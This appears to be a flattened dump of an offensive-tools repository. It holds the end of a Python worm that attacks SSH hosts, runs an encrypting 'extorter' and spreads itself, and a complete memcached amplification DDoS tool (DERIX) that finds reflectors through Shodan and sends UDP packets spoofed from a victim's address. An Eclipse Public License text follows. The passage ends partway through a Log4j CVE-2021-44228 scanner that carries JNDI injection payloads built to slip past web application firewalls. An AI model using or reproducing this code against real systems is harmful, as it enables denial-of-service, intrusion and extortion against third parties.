for index in range(len(networkHosts) - 1): 250 | if (networkHosts[index] == myIP): 251 | del networkHosts[index] 252 | 253 | # TODO: Remove the IP of the current system 254 | # from the list of discovered systems (we 255 | # do not want to target ourselves!). 256 | print 257 | "Found hosts: ", networkHosts 258 | 259 | # Go through the network hosts 260 | for host in networkHosts: 261 | 262 | # Try to attack this host 263 | sshInfo = attackSystem(host) 264 | 265 | print 266 | sshInfo 267 | 268 | # Did the attack succeed? 269 | if sshInfo: 270 | print 271 | "Encrypting" 272 | HOSTIP = getMyIP() 273 | extorter() 274 | print 275 | "Trying to spread" 276 | spreadAndExecute(sshInfo[0]) 277 | 278 | print 279 | "Spreading complete" 280 | sys.exit(0) -------------------------------------------------------------------------------- /DDos/DERIX.py: -------------------------------------------------------------------------------- 1 | #-- coding: utf8 -- 2 | #!/usr/bin/env python3 3 | import sys, os, time, shodan 4 | from pathlib import Path 5 | from scapy.all import * 6 | from contextlib import contextmanager, redirect_stdout 7 | 8 | starttime = time.time() 9 | 10 | @contextmanager 11 | def suppress_stdout(): 12 | with open(os.devnull, "w") as devnull: 13 | with redirect_stdout(devnull): 14 | yield 15 | 16 | class color: 17 | HEADER = '\033[0m' 18 | 19 | keys = Path("./api.txt") 20 | logo = color.HEADER + ''' 21 | DERIX 22 | Author: Malwareman 23 | ####################################### DISCLAIMER ######################################## 24 | | DERIX is a tool that allows you to use Shodan.io to obtain hundreds of vulnerable | 25 | | memcached servers. It then allows you to use the same servers to launch widespread | 26 | | distributed denial of service attacks by forging UDP packets sourced to your victim. | 27 | | Default payload includes the memcached "stats" command, 10 bytes to send, but the reply | 28 | | is between 1,500 bytes up to hundreds of kilobytes. Please use this tool responsibly. | 29 | | I am NOT responsible for any damages caused or any crimes committed by using this tool. | 30 | ########################################################################################### 31 | 32 | ''' 33 | print(logo) 34 | 35 | if keys.is_file(): 36 | with open('api.txt', 'r') as file: 37 | SHODAN_API_KEY=file.readline().rstrip('\n') 38 | else: 39 | file = open('api.txt', 'w') 40 | SHODAN_API_KEY = input('[*] Please enter a valid Shodan.io API Key: ') 41 | file.write(SHODAN_API_KEY) 42 | print('[~] File written: ./api.txt') 43 | file.close() 44 | 45 | while True: 46 | api = shodan.Shodan(SHODAN_API_KEY) 47 | print('') 48 | try: 49 | myresults = Path("./bots.txt") 50 | query = input("[*] Use Shodan API to search for affected Memcached servers? : ").lower() 51 | if query.startswith('y'): 52 | print('') 53 | print('[~] Checking Shodan.io API Key: %s' % SHODAN_API_KEY) 54 | results = api.search('product:"Memcached" port:11211') 55 | print('[✓] API Key Authentication: SUCCESS') 56 | print('[~] Number of bots: %s' % results['total']) 57 | print('') 58 | saveresult = input("[*] Save results for later usage? : ").lower() 59 | if saveresult.startswith('y'): 60 | file2 = open('bots.txt', 'a') 61 | for result in results['matches']: 62 | file2.write(result['ip_str'] + "\n") 63 | print('[~] File written: ./bots.txt') 64 | print('') 65 | file2.close() 66 | saveme = input('[*] Would you like to use locally stored Shodan data? : ').lower() 67 | if myresults.is_file(): 68 | if saveme.startswith('y'): 69 | with open('bots.txt') as my_file: 70 | ip_array = [line.rstrip() for line in my_file] 71 | else: 72 | print('') 73 | print('[✘] Error: No bots stored locally, bots.txt file not found!') 74 | print('') 75 | if saveme.startswith('y') or query.startswith('y'): 76 | print('') 77 | target = input("[▸] Enter target IP address: ") 78 | targetport = input("[▸] Enter target port number (Default 80): ") or "80" 79 | power = int(input("[▸] Enter preferred power (Default 1): ") or "1") 80 | print('') 81 | data = input("[+] Enter payload contained inside packet: ") or "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n" 82 | if (data != "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n"): 83 | dataset = "set injected 0 3600 ", len(data)+1, "\r\n", data, "\r\n get injected\r\n" 84 | setdata = ("\x00\x00\x00\x00\x00\x00\x00\x00set\x00injected\x000\x003600\x00%s\r\n%s\r\n" % (len(data)+1, data)) 85 | getdata = ("\x00\x00\x00\x00\x00\x00\x00\x00get\x00injected\r\n") 86 | print("[+] Payload transformed: ", dataset) 87 | print('') 88 | if query.startswith('y'): 89 | iplist = input('[*] Would you like to display all the bots from Shodan? : ').lower() 90 | if iplist.startswith('y'): 91 | print('') 92 | counter= int(0) 93 | for result in results['matches']: 94 | host = api.host('%s' % result['ip_str']) 95 | counter=counter+1 96 | print('[+] Memcache Server (%d) | IP: %s | OS: %s | ISP: %s |' % (counter, result['ip_str'], host.get('os', 'n/a'), host.get('org', 'n/a'))) 97 | time.sleep(1.1 - ((time.time() - starttime) % 1.1)) 98 | if saveme.startswith('y'): 99 | iplistlocal = input('[*] Would you like to display all the bots stored locally? : ').lower() 100 | if iplistlocal.startswith('y'): 101 | print('') 102 | counter= int(0) 103 | for x in ip_array: 104 | host = api.host('%s' % x) 105 | counter=counter+1 106 | print('[+] Memcache Server (%d) | IP: %s | OS: %s | ISP: %s |' % (counter, x, host.get('os', 'n/a'), host.get('org', 'n/a'))) 107 | time.sleep(1.1 - ((time.time() - starttime) % 1.1)) 108 | print('') 109 | engage = input('[*] Ready to engage target %s? : ' % target).lower() 110 | if engage.startswith('y'): 111 | if saveme.startswith('y'): 112 | for i in ip_array: 113 | if (data != "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n"): 114 | print('[+] Sending 2 forged synchronized payloads to: %s' % (i)) 115 | with suppress_stdout(): 116 | send(IP(src=target, dst='%s' % i) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=setdata), count=1) 117 | send(IP(src=target, dst='%s' % i) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=getdata), count=power) 118 | else: 119 | if power>1: 120 | print('[+] Sending %d forged UDP packets to: %s' % (power, i)) 121 | with suppress_stdout(): 122 | send(IP(src=target, dst='%s' % i) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=data), count=power) 123 | elif power==1: 124 | print('[+] Sending 1 forged UDP packet to: %s' % i) 125 | with suppress_stdout(): 126 | send(IP(src=target, dst='%s' % i) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=data), count=power) 127 | else: 128 | for result in results['matches']: 129 | if (data != "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n"): 130 | print('[+] Sending 2 forged synchronized payloads to: %s' % (i)) 131 | with suppress_stdout(): 132 | send(IP(src=target, dst='%s' % result['ip_str']) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=setdata), count=1) 133 | send(IP(src=target, dst='%s' % result['ip_str']) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=getdata), count=power) 134 | else: 135 | if power>1: 136 | print('[+] Sending %d forged UDP packets to: %s' % (power, result['ip_str'])) 137 | with suppress_stdout(): 138 | send(IP(src=target, dst='%s' % result['ip_str']) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=data), count=power) 139 | elif power==1: 140 | print('[+] Sending 1 forged UDP packet to: %s' % result['ip_str']) 141 | with suppress_stdout(): 142 | send(IP(src=target, dst='%s' % result['ip_str']) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=data), count=power) 143 | print('') 144 | print('[•] Task complete! Exiting Platform. Have a wonderful day.') 145 | break 146 | else: 147 | print('') 148 | print('[✘] Error: %s not engaged!' % target) 149 | print('[~] Restarting Platform! Please wait.') 150 | print('') 151 | else: 152 | print('') 153 | print('[✘] Error: No bots stored locally or remotely on Shodan!') 154 | print('[~] Restarting Platform! Please wait.') 155 | print('') 156 | 157 | except shodan.APIError as e: 158 | print('[✘] Error: %s' % e) 159 | option = input('[*] Would you like to change API Key? : ').lower() 160 | if option.startswith('y'): 161 | file = open('api.txt', 'w') 162 | SHODAN_API_KEY = input('[*] Please enter valid Shodan.io API Key: ') 163 | file.write(SHODAN_API_KEY) 164 | print('[~] File written: ./api.txt') 165 | file.close() 166 | print('[~] Restarting Platform! Please wait.') 167 | print('') 168 | else: 169 | print('') 170 | print('[•] Exiting Platform. Have a wonderful day.') 171 | break 172 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Eclipse Public License - v 2.0 2 | 3 | THE ACCOMPANYING PROGRAM IS PROVIDED UNDER THE TERMS OF THIS ECLIPSE 4 | PUBLIC LICENSE ("AGREEMENT"). ANY USE, REPRODUCTION OR DISTRIBUTION 5 | OF THE PROGRAM CONSTITUTES RECIPIENT'S ACCEPTANCE OF THIS AGREEMENT. 6 | 7 | 1. DEFINITIONS 8 | 9 | "Contribution" means: 10 | 11 | a) in the case of the initial Contributor, the initial content 12 | Distributed under this Agreement, and 13 | 14 | b) in the case of each subsequent Contributor: 15 | i) changes to the Program, and 16 | ii) additions to the Program; 17 | where such changes and/or additions to the Program originate from 18 | and are Distributed by that particular Contributor. A Contribution 19 | "originates" from a Contributor if it was added to the Program by 20 | such Contributor itself or anyone acting on such Contributor's behalf. 21 | Contributions do not include changes or additions to the Program that 22 | are not Modified Works. 23 | 24 | "Contributor" means any person or entity that Distributes the Program. 25 | 26 | "Licensed Patents" mean patent claims licensable by a Contributor which 27 | are necessarily infringed by the use or sale of its Contribution alone 28 | or when combined with the Program. 29 | 30 | "Program" means the Contributions Distributed in accordance with this 31 | Agreement. 32 | 33 | "Recipient" means anyone who receives the Program under this Agreement 34 | or any Secondary License (as applicable), including Contributors. 35 | 36 | "Derivative Works" shall mean any work, whether in Source Code or other 37 | form, that is based on (or derived from) the Program and for which the 38 | editorial revisions, annotations, elaborations, or other modifications 39 | represent, as a whole, an original work of authorship. 40 | 41 | "Modified Works" shall mean any work in Source Code or other form that 42 | results from an addition to, deletion from, or modification of the 43 | contents of the Program, including, for purposes of clarity any new file 44 | in Source Code form that contains any contents of the Program. Modified 45 | Works shall not include works that contain only declarations, 46 | interfaces, types, classes, structures, or files of the Program solely 47 | in each case in order to link to, bind by name, or subclass the Program 48 | or Modified Works thereof. 49 | 50 | "Distribute" means the acts of a) distributing or b) making available 51 | in any manner that enables the transfer of a copy. 52 | 53 | "Source Code" means the form of a Program preferred for making 54 | modifications, including but not limited to software source code, 55 | documentation source, and configuration files. 56 | 57 | "Secondary License" means either the GNU General Public License, 58 | Version 2.0, or any later versions of that license, including any 59 | exceptions or additional permissions as identified by the initial 60 | Contributor. 61 | 62 | 2. GRANT OF RIGHTS 63 | 64 | a) Subject to the terms of this Agreement, each Contributor hereby 65 | grants Recipient a non-exclusive, worldwide, royalty-free copyright 66 | license to reproduce, prepare Derivative Works of, publicly display, 67 | publicly perform, Distribute and sublicense the Contribution of such 68 | Contributor, if any, and such Derivative Works. 69 | 70 | b) Subject to the terms of this Agreement, each Contributor hereby 71 | grants Recipient a non-exclusive, worldwide, royalty-free patent 72 | license under Licensed Patents to make, use, sell, offer to sell, 73 | import and otherwise transfer the Contribution of such Contributor, 74 | if any, in Source Code or other form. This patent license shall 75 | apply to the combination of the Contribution and the Program if, at 76 | the time the Contribution is added by the Contributor, such addition 77 | of the Contribution causes such combination to be covered by the 78 | Licensed Patents. The patent license shall not apply to any other 79 | combinations which include the Contribution. No hardware per se is 80 | licensed hereunder. 81 | 82 | c) Recipient understands that although each Contributor grants the 83 | licenses to its Contributions set forth herein, no assurances are 84 | provided by any Contributor that the Program does not infringe the 85 | patent or other intellectual property rights of any other entity. 86 | Each Contributor disclaims any liability to Recipient for claims 87 | brought by any other entity based on infringement of intellectual 88 | property rights or otherwise. As a condition to exercising the 89 | rights and licenses granted hereunder, each Recipient hereby 90 | assumes sole responsibility to secure any other intellectual 91 | property rights needed, if any. For example, if a third party 92 | patent license is required to allow Recipient to Distribute the 93 | Program, it is Recipient's responsibility to acquire that license 94 | before distributing the Program. 95 | 96 | d) Each Contributor represents that to its knowledge it has 97 | sufficient copyright rights in its Contribution, if any, to grant 98 | the copyright license set forth in this Agreement. 99 | 100 | e) Notwithstanding the terms of any Secondary License, no 101 | Contributor makes additional grants to any Recipient (other than 102 | those set forth in this Agreement) as a result of such Recipient's 103 | receipt of the Program under the terms of a Secondary License 104 | (if permitted under the terms of Section 3). 105 | 106 | 3. REQUIREMENTS 107 | 108 | 3.1 If a Contributor Distributes the Program in any form, then: 109 | 110 | a) the Program must also be made available as Source Code, in 111 | accordance with section 3.2, and the Contributor must accompany 112 | the Program with a statement that the Source Code for the Program 113 | is available under this Agreement, and informs Recipients how to 114 | obtain it in a reasonable manner on or through a medium customarily 115 | used for software exchange; and 116 | 117 | b) the Contributor may Distribute the Program under a license 118 | different than this Agreement, provided that such license: 119 | i) effectively disclaims on behalf of all other Contributors all 120 | warranties and conditions, express and implied, including 121 | warranties or conditions of title and non-infringement, and 122 | implied warranties or conditions of merchantability and fitness 123 | for a particular purpose; 124 | 125 | ii) effectively excludes on behalf of all other Contributors all 126 | liability for damages, including direct, indirect, special, 127 | incidental and consequential damages, such as lost profits; 128 | 129 | iii) does not attempt to limit or alter the recipients' rights 130 | in the Source Code under section 3.2; and 131 | 132 | iv) requires any subsequent distribution of the Program by any 133 | party to be under a license that satisfies the requirements 134 | of this section 3. 135 | 136 | 3.2 When the Program is Distributed as Source Code: 137 | 138 | a) it must be made available under this Agreement, or if the 139 | Program (i) is combined with other material in a separate file or 140 | files made available under a Secondary License, and (ii) the initial 141 | Contributor attached to the Source Code the notice described in 142 | Exhibit A of this Agreement, then the Program may be made available 143 | under the terms of such Secondary Licenses, and 144 | 145 | b) a copy of this Agreement must be included with each copy of 146 | the Program. 147 | 148 | 3.3 Contributors may not remove or alter any copyright, patent, 149 | trademark, attribution notices, disclaimers of warranty, or limitations 150 | of liability ("notices") contained within the Program from any copy of 151 | the Program which they Distribute, provided that Contributors may add 152 | their own appropriate notices. 153 | 154 | 4. COMMERCIAL DISTRIBUTION 155 | 156 | Commercial distributors of software may accept certain responsibilities 157 | with respect to end users, business partners and the like. While this 158 | license is intended to facilitate the commercial use of the Program, 159 | the Contributor who includes the Program in a commercial product 160 | offering should do so in a manner which does not create potential 161 | liability for other Contributors. Therefore, if a Contributor includes 162 | the Program in a commercial product offering, such Contributor 163 | ("Commercial Contributor") hereby agrees to defend and indemnify every 164 | other Contributor ("Indemnified Contributor") against any losses, 165 | damages and costs (collectively "Losses") arising from claims, lawsuits 166 | and other legal actions brought by a third party against the Indemnified 167 | Contributor to the extent caused by the acts or omissions of such 168 | Commercial Contributor in connection with its distribution of the Program 169 | in a commercial product offering. The obligations in this section do not 170 | apply to any claims or Losses relating to any actual or alleged 171 | intellectual property infringement. In order to qualify, an Indemnified 172 | Contributor must: a) promptly notify the Commercial Contributor in 173 | writing of such claim, and b) allow the Commercial Contributor to control, 174 | and cooperate with the Commercial Contributor in, the defense and any 175 | related settlement negotiations. The Indemnified Contributor may 176 | participate in any such claim at its own expense. 177 | 178 | For example, a Contributor might include the Program in a commercial 179 | product offering, Product X. That Contributor is then a Commercial 180 | Contributor. If that Commercial Contributor then makes performance 181 | claims, or offers warranties related to Product X, those performance 182 | claims and warranties are such Commercial Contributor's responsibility 183 | alone. Under this section, the Commercial Contributor would have to 184 | defend claims against the other Contributors related to those performance 185 | claims and warranties, and if a court requires any other Contributor to 186 | pay any damages as a result, the Commercial Contributor must pay 187 | those damages. 188 | 189 | 5. NO WARRANTY 190 | 191 | EXCEPT AS EXPRESSLY SET FORTH IN THIS AGREEMENT, AND TO THE EXTENT 192 | PERMITTED BY APPLICABLE LAW, THE PROGRAM IS PROVIDED ON AN "AS IS" 193 | BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, EITHER EXPRESS OR 194 | IMPLIED INCLUDING, WITHOUT LIMITATION, ANY WARRANTIES OR CONDITIONS OF 195 | TITLE, NON-INFRINGEMENT, MERCHANTABILITY OR FITNESS FOR A PARTICULAR 196 | PURPOSE. Each Recipient is solely responsible for determining the 197 | appropriateness of using and distributing the Program and assumes all 198 | risks associated with its exercise of rights under this Agreement, 199 | including but not limited to the risks and costs of program errors, 200 | compliance with applicable laws, damage to or loss of data, programs 201 | or equipment, and unavailability or interruption of operations. 202 | 203 | 6. DISCLAIMER OF LIABILITY 204 | 205 | EXCEPT AS EXPRESSLY SET FORTH IN THIS AGREEMENT, AND TO THE EXTENT 206 | PERMITTED BY APPLICABLE LAW, NEITHER RECIPIENT NOR ANY CONTRIBUTORS 207 | SHALL HAVE ANY LIABILITY FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, 208 | EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING WITHOUT LIMITATION LOST 209 | PROFITS), HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN 210 | CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) 211 | ARISING IN ANY WAY OUT OF THE USE OR DISTRIBUTION OF THE PROGRAM OR THE 212 | EXERCISE OF ANY RIGHTS GRANTED HEREUNDER, EVEN IF ADVISED OF THE 213 | POSSIBILITY OF SUCH DAMAGES. 214 | 215 | 7. GENERAL 216 | 217 | If any provision of this Agreement is invalid or unenforceable under 218 | applicable law, it shall not affect the validity or enforceability of 219 | the remainder of the terms of this Agreement, and without further 220 | action by the parties hereto, such provision shall be reformed to the 221 | minimum extent necessary to make such provision valid and enforceable. 222 | 223 | If Recipient institutes patent litigation against any entity 224 | (including a cross-claim or counterclaim in a lawsuit) alleging that the 225 | Program itself (excluding combinations of the Program with other software 226 | or hardware) infringes such Recipient's patent(s), then such Recipient's 227 | rights granted under Section 2(b) shall terminate as of the date such 228 | litigation is filed. 229 | 230 | All Recipient's rights under this Agreement shall terminate if it 231 | fails to comply with any of the material terms or conditions of this 232 | Agreement and does not cure such failure in a reasonable period of 233 | time after becoming aware of such noncompliance. If all Recipient's 234 | rights under this Agreement terminate, Recipient agrees to cease use 235 | and distribution of the Program as soon as reasonably practicable. 236 | However, Recipient's obligations under this Agreement and any licenses 237 | granted by Recipient relating to the Program shall continue and survive. 238 | 239 | Everyone is permitted to copy and distribute copies of this Agreement, 240 | but in order to avoid inconsistency the Agreement is copyrighted and 241 | may only be modified in the following manner. The Agreement Steward 242 | reserves the right to publish new versions (including revisions) of 243 | this Agreement from time to time. No one other than the Agreement 244 | Steward has the right to modify this Agreement. The Eclipse Foundation 245 | is the initial Agreement Steward. The Eclipse Foundation may assign the 246 | responsibility to serve as the Agreement Steward to a suitable separate 247 | entity. Each new version of the Agreement will be given a distinguishing 248 | version number. The Program (including Contributions) may always be 249 | Distributed subject to the version of the Agreement under which it was 250 | received. In addition, after a new version of the Agreement is published, 251 | Contributor may elect to Distribute the Program (including its 252 | Contributions) under the new version. 253 | 254 | Except as expressly stated in Sections 2(a) and 2(b) above, Recipient 255 | receives no rights or licenses to the intellectual property of any 256 | Contributor under this Agreement, whether expressly, by implication, 257 | estoppel or otherwise. All rights in the Program not expressly granted 258 | under this Agreement are reserved. Nothing in this Agreement is intended 259 | to be enforceable by any entity that is not a Contributor or Recipient. 260 | No third-party beneficiary rights are created under this Agreement. 261 | 262 | Exhibit A - Form of Secondary Licenses Notice 263 | 264 | "This Source Code may also be made available under the following 265 | Secondary Licenses when the conditions for such availability set forth 266 | in the Eclipse Public License, v. 2.0 are satisfied: {name license(s), 267 | version(s), and exceptions or additional permissions here}." 268 | 269 | Simply including a copy of this Agreement, including this Exhibit A 270 | is not sufficient to license the Source Code under Secondary Licenses. 271 | 272 | If it is not possible or desirable to put the notice in a particular 273 | file, then You may include the notice in a location (such as a LICENSE 274 | file in a relevant directory) where a recipient would be likely to 275 | look for such a notice. 276 | 277 | You may add additional accurate notices of copyright ownership. 278 | -------------------------------------------------------------------------------- /Scanner/Log4jScanner/log4jscanner.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import argparse 4 | import random 5 | import requests 6 | import time 7 | import sys 8 | from urllib import parse as urlparse 9 | import base64 10 | import json 11 | from uuid import uuid4 12 | from base64 import b64encode 13 | from Crypto.Cipher import AES, PKCS1_OAEP 14 | from Crypto.PublicKey import RSA 15 | from Crypto.Hash import SHA256 16 | from termcolor import cprint 17 | 18 | 19 | # Disable SSL warnings 20 | try: 21 | import requests.packages.urllib3 22 | requests.packages.urllib3.disable_warnings() 23 | except Exception: 24 | pass 25 | 26 | 27 | cprint('[•] CVE-2021-44228 - Apache Log4j RCE Scanner', "green") 28 | cprint('[•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform.', "yellow") 29 | cprint('[•] Secure your External Attack Surface with FullHunt.io.', "yellow") 30 | 31 | if len(sys.argv) <= 1: 32 | print(('\n%s -h for help.' % (sys.argv[0]))) 33 | exit(0) 34 | 35 | 36 | default_headers = { 37 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36', 38 | 'Accept': '*/*' # not being tested to allow passing through checks on Accept header in older web-servers 39 | } 40 | 41 | post_data_parameters = ["username", "user", "uname", "name", "email", "email_address", "password"] 42 | timeout = 4 43 | 44 | waf_bypass_payloads = ["${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://{{callback_host}}/{{random}}}", 45 | "${${::-j}ndi:rmi://{{callback_host}}/{{random}}}", 46 | "${jndi:rmi://{{callback_host}}/{{random}}}", 47 | "${jndi:rmi://{{callback_host}}}/", 48 | "${${lower:jndi}:${lower:rmi}://{{callback_host}}/{{random}}}", 49 | "${${lower:${lower:jndi}}:${lower:rmi}://{{callback_host}}/{{random}}}", 50 | "${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://{{callback_host}}/{{random}}}", 51 | "${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://{{callback_host}}/{{random}}}", 52 | "${jndi:dns://{{callback_host}}/{{random}}}", 53 | "${jnd${123%25ff:-${123%25ff:-i:}}ldap://{{callback_host}}/{{random}}}", 54 | "${jndi:dns://{{callback_host}}}", 55 | "${j${k8s:k5:-ND}i:ldap://{{callback_host}}/{{random}}}", 56 | "${j${k8s:k5:-ND}i:ldap${sd:k5:-:}//{{callback_host}}/{{random}}}", 57 | "${j${k8s:k5:-ND}i${sd:k5:-:}ldap://{{callback_host}}/{{random}}}", 58 | "${j${k8s:k5:-ND}i${sd:k5:-:}ldap${sd:k5:-:}//{{callback_host}}/{{random}}}", 59 | "${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap://{{callback_host}}/{{random}}}", 60 | "${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap{sd:k5:-:}//{{callback_host}}/{{random}}}", 61 | "${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//{{callback_host}}/{{random}}}", 62 | "${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//{{callback_host}}/{{random}}", 63 | "${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}a${::-p}${sd:k5:-:}//{{callback_host}}/{{random}}}", 64 | "${jndi:${lower:l}${lower:d}a${lower:p}://{{callback_host}}}", 65 | "${jnd${upper:i}:ldap://{{callback_host}}/{{random}}}", 66 | "${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://{{callback_host}}/{{random}}}" 67 | ] 68 | 69 | cve_2021_45046 = [ 70 | "${jndi:ldap://127.0.0.1#{{callback_host}}:1389/{{random}}}", 71 | "${jndi:ldap://127.0.0.1#{{callback_host}}/{{random}}}", 72 | "${jndi:ldap://127.1.1.1#{{callback_host}}/{{random}}}" 73 | ] 74 | 75 | parser = argparse.ArgumentParser() 76 | parser.add_argument("-u", "--url", 77 | dest="url", 78 | help="Check a single URL.", 79 | action='store') 80 | parser.add_argument("-p", "--proxy", 81 | dest="proxy", 82 | help="send requests through proxy", 83 | action='store') 84 | parser.add_argument("-l", "--list", 85 | dest="usedlist", 86 | help="Check a list of URLs.", 87 | action='store') 88 | parser.add_argument("--request-type", 89 | dest="request_type", 90 | help="Request Type: (get, post) - [Default: get].", 91 | default="get", 92 | action='store') 93 | parser.add_argument("--headers-file", 94 | dest="headers_file", 95 | help="Headers fuzzing list - [default: headers.txt].", 96 | default="headers.txt", 97 | action='store') 98 | parser.add_argument("--run-all-tests", 99 | dest="run_all_tests", 100 | help="Run all available tests on each URL.", 101 | action='store_true') 102 | parser.add_argument("--exclude-user-agent-fuzzing", 103 | dest="exclude_user_agent_fuzzing", 104 | help="Exclude User-Agent header from fuzzing - useful to bypass weak checks on User-Agents.", 105 | action='store_true') 106 | parser.add_argument("--wait-time", 107 | dest="wait_time", 108 | help="Wait time after all URLs are processed (in seconds) - [Default: 5].", 109 | default=5, 110 | type=int, 111 | action='store') 112 | parser.add_argument("--waf-bypass", 113 | dest="waf_bypass_payloads", 114 | help="Extend scans with WAF bypass payloads.", 115 | action='store_true') 116 | parser.add_argument("--custom-waf-bypass-payload", 117 | dest="custom_waf_bypass_payload", 118 | help="Test with custom WAF bypass payload.") 119 | parser.add_argument("--test-CVE-2021-45046", 120 | dest="cve_2021_45046", 121 | help="Test using payloads for CVE-2021-45046 (detection payloads).", 122 | action='store_true') 123 | parser.add_argument("--dns-callback-provider", 124 | dest="dns_callback_provider", 125 | help="DNS Callback provider [Default: interact.sh].", 126 | default="interact.sh", 127 | action='store') 128 | parser.add_argument("--custom-dns-callback-host", 129 | dest="custom_dns_callback_host", 130 | help="Custom DNS Callback Host.", 131 | action='store') 132 | parser.add_argument("--disable-http-redirects", 133 | dest="disable_redirects", 134 | help="Disable HTTP redirects. Note: HTTP redirects are useful as it allows the payloads to have a higher chance of reaching vulnerable systems.", 135 | action='store_true') 136 | 137 | args = parser.parse_args() 138 | 139 | 140 | proxies = {} 141 | if args.proxy: 142 | proxies = {"http": args.proxy, "https": args.proxy} 143 | 144 | 145 | if args.custom_waf_bypass_payload: 146 | waf_bypass_payloads.append(args.custom_waf_bypass_payload) 147 | 148 | 149 | def get_fuzzing_headers(payload): 150 | fuzzing_headers = {} 151 | fuzzing_headers.update(default_headers) 152 | with open(args.headers_file, "r") as f: 153 | for i in f.readlines(): 154 | i = i.strip() 155 | if i == "" or i.startswith("#"): 156 | continue 157 | fuzzing_headers.update({i: payload}) 158 | if args.exclude_user_agent_fuzzing: 159 | fuzzing_headers["User-Agent"] = default_headers["User-Agent"] 160 | 161 | if "Referer" in fuzzing_headers: 162 | fuzzing_headers["Referer"] = f'https://{fuzzing_headers["Referer"]}' 163 | return fuzzing_headers 164 | 165 | 166 | def get_fuzzing_post_data(payload): 167 | fuzzing_post_data = {} 168 | for i in post_data_parameters: 169 | fuzzing_post_data.update({i: payload}) 170 | return fuzzing_post_data 171 | 172 | 173 | def generate_waf_bypass_payloads(callback_host, random_string): 174 | payloads = [] 175 | for i in waf_bypass_payloads: 176 | new_payload = i.replace("{{callback_host}}", callback_host) 177 | new_payload = new_payload.replace("{{random}}", random_string) 178 | payloads.append(new_payload) 179 | return payloads 180 | 181 | 182 | def get_cve_2021_45046_payloads(callback_host, random_string): 183 | payloads = [] 184 | for i in cve_2021_45046: 185 | new_payload = i.replace("{{callback_host}}", callback_host) 186 | new_payload = new_payload.replace("{{random}}", random_string) 187 | payloads.append(new_payload) 188 | return payloads 189 | 190 | 191 | class Interactsh: 192 | # Source: https://github.com/knownsec/pocsuite3/blob/master/pocsuite3/modules/interactsh/__init__.py 193 | def __init__(self, token="", server=""): 194 | rsa = RSA.generate(2048) 195 | self.public_key = rsa.publickey().exportKey() 196 | self.private_key = rsa.exportKey() 197 | self.token = token 198 | self.server = server.lstrip('.') or 'interact.sh' 199 | self.headers = { 200 | "Content-Type": "application/json", 201 | } 202 | if self.token: 203 | self.headers['Authorization'] = self.token 204 | self.secret = str(uuid4()) 205 | self.encoded = b64encode(self.public_key).decode("utf8") 206 | guid = uuid4().hex.ljust(33, 'a') 207 | guid = ''.join(i if i.isdigit() else chr(ord(i) + random.randint(0, 20)) for i in guid) 208 | self.domain = f'{guid}.{self.server}' 209 | self.correlation_id = self.domain[:20] 210 | 211 | self.session = requests.session() 212 | self.session.headers = self.headers 213 | self.session.verify = False 214 | self.session.proxies = proxies 215 | self.register() 216 | 217 | def register(self): 218 | data = { 219 | "public-key": self.encoded, 220 | "secret-key": self.secret, 221 | "correlation-id": self.correlation_id 222 | } 223 | res = self.session.post( 224 | f"https://{self.server}/register", headers=self.headers, json=data, timeout=30) 225 | if 'success' not in res.text: 226 | raise Exception("Can not initiate interact.sh DNS callback client") 227 | 228 | def pull_logs(self): 229 | result = [] 230 | url = f"https://{self.server}/poll?id={self.correlation_id}&secret={self.secret}" 231 | res = self.session.get(url, headers=self.headers, timeout=30).json() 232 | aes_key, data_list = res['aes_key'], res['data'] 233 | for i in data_list: 234 | decrypt_data = self.__decrypt_data(aes_key, i) 235 | result.append(self.__parse_log(decrypt_data)) 236 | return result 237 | 238 | def __decrypt_data(self, aes_key, data): 239 | private_key = RSA.importKey(self.private_key) 240 | cipher = PKCS1_OAEP.new(private_key, hashAlgo=SHA256) 241 | aes_plain_key = cipher.decrypt(base64.b64decode(aes_key)) 242 | decode = base64.b64decode(data) 243 | bs = AES.block_size 244 | iv = decode[:bs] 245 | cryptor = AES.new(key=aes_plain_key, mode=AES.MODE_CFB, IV=iv, segment_size=128) 246 | plain_text = cryptor.decrypt(decode) 247 | return json.loads(plain_text[16:]) 248 | 249 | def __parse_log(self, log_entry): 250 | new_log_entry = {"timestamp": log_entry["timestamp"], 251 | "host": f'{log_entry["full-id"]}.{self.domain}', 252 | "remote_address": log_entry["remote-address"] 253 | } 254 | return new_log_entry 255 | 256 | 257 | def parse_url(url): 258 | """ 259 | Parses the URL. 260 | """ 261 | 262 | # Url: https://example.com/login.jsp 263 | url = url.replace('#', '%23') 264 | url = url.replace(' ', '%20') 265 | 266 | if ('://' not in url): 267 | url = str("http://") + str(url) 268 | 